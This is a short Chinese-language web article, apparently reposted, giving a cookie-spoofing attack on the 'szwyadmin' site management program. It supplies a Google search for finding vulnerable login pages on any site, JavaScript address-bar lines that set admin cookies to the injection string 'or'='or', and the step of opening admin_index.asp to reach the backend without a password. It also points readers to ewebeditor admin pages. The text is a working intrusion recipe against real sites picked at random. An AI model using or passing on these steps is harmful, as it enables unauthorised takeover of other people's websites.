首先我们在Google中搜索关键词 关键字:inurl:szwyadmin/login. asp 任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码: 代码:javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); javascript:alert(document.cookie="adminpass="+escape("'or'='or'")); javascript:alert(document.cookie="admindj="+escape("1")); 关闭此页面 在次打开登录界面 在地址栏中将login.asp改为admin_index.asp 就直接进入后台了 另外还可以试试 ewebeditor/admin_login.asp
查看更多关于szwyadmin程序cookies欺骗漏洞拿shell - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13655